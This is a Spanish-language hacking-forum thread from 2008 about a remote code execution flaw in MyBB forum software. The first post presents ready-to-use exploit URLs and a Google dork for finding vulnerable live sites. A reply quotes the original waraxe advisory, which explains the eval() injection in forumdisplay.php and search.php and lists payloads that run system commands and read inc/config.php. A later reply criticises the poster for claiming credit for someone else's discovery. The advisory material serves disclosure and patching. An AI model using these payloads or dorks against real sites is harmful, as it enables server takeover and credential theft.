elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Otro BUG en MyBB
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Otro BUG en MyBB  (Leído 4,097 veces)
Zion1024
TROLL

Desconectado Desconectado

Mensajes: 27



Ver Perfil
Otro BUG en MyBB
« en: 23 Enero 2008, 19:42 pm »

He descubierto un bug que afecta los foros hechos en MyBB recientes.
mi dork: inurl:"forumdisplay.php?fid=" +intext:"MyBB Group"

Exploit:
Código:
'];<comando PHP>;exit;//

Sintaxis:
http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby=[exploit]

Ejemplos:
http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby='];phpinfo();exit;//

http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby='];system('ls');exit;//

by zion ;D
Mi fuente.
« Última modificación: 24 Enero 2008, 21:27 pm por sirdarckcat » En línea

c3r0x

Desconectado Desconectado

Mensajes: 70


http://imagizer.imageshack.us/v2/800x600q90/809/lt


Ver Perfil
Re: Otro BUG en MyBB
« Respuesta #1 en: 23 Enero 2008, 23:01 pm »

He descubierto un bug que afecta los foros hechos en MyBB recientes.
mi dork: inurl:"forumdisplay.php?fid=" +intext:"MyBB Group"

Exploit:
Código:
'];<comando PHP>;exit;//

Sintaxis:
http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby=[exploit]

Ejemplos:
http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby='];phpinfo();exit;//

http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby='];system('ls');exit;//

by zion ;D
Mi fuente.

Este advisorie lo publico waraxe  :) :) :) :)

Fuente verdadera: http://www.waraxe.us/advisory-61.html

Código:
Author: Janek Vind "waraxe"
Independent discovery: koziolek
Date: 16. January 2008
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-61.html


Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MyBB is a discussion board that has been around for a while; it has evolved
from other bulletin boards into the forum package it is today. Therefore,
it is a professional and efficient discussion board, developed by an active
team of developers.

Vulnerabilities discovered
===============================================================================

1. Remote Code Execution in "forumdisplay.php":
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Precondition: valid forum "fid" must be known.
Attacker doesn't need to have any privileges in mybb installation to be
successful in attack.

Proof-Of-Concept request:

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='

... and we will see error message:

Parse error: syntax error, unexpected ''', expecting ']' in
C:apache_wwwrootmybb.1.2.10forumdisplay.php(407) : eval()'d code on line 1

Problematic piece of code is related to "eval()" function:

eval("$orderarrow['$sortby'] = "".
$templates->get("forumdisplay_orderarrow")."";");


Example attacks:

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2
&sortby='];phpinfo();exit;//
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2
&sortby='];system('ls');exit;//
http://localhost/mybb.1.2.10/forumdisplay.php?fid=2
&sortby='];readfile('inc/config.php');exit;//


2. Remote Code Execution in "search.php":
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Precondition: search "sid" must be known - but that's trivial task.
Attacker doesn't need to have any privileges in mybb installation to be
successful in attack.

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]
&sortby='

Parse error: syntax error, unexpected ''', expecting ']' in
C:apache_wwwrootmybb.1.2.10search.php(141) : eval()'d code on line 1

Problematic is exactly same piece of code, as in previous case:

eval("$orderarrow['$sortby'] = "".
$templates->get("forumdisplay_orderarrow")."";");

Example attacks:

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]
&sortby='];phpinfo();exit;//
http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]
&sortby='];system('ls');exit;//
http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]
&sortby='];readfile('inc/config.php');exit;//

Both remote code execution security holes are very dangerous and can be
used by attacker to complete takeover the website and possible total
compromise of webserver.

How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Download MyBB new version 1.2.11 as soon as possible!


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb
and anyone else who know me!
Greetings to Raido Kerna. Tervitusi Torufoorumi rahvale!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.janekvind.com/
Waraxe forum: http://www.waraxe.us/forums.html

---------------------------------- [ EOF ] ------------------------------------

Ya deja los copy paste

salu2

« Última modificación: 25 Enero 2008, 04:14 am por sirdarckcat » En línea

berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: Otro BUG en MyBB
« Respuesta #2 en: 25 Enero 2008, 04:19 am »


Joder discutir lo que otros foros hacen eso s0x!!

Atraverse a decir "Descubri" sin antes mirar lo publico o indagar un poco en inet/google, si que es "valor" :D

El bug fue reportado por "Silentz" de http://www.w4ck1ng.com/ y mantenido en 0day hasta su publicacion, tambien por "waraxe" ya hace algunas semanas, solo esperaban el feedback del vendor para publicar.

-berz3k.

En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
¿NodeBB vs PhpBB SMF MyBB?
Desarrollo Web
bacanzito 2 2,519 Último mensaje 5 Julio 2014, 18:34 pm
por aacm1990
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines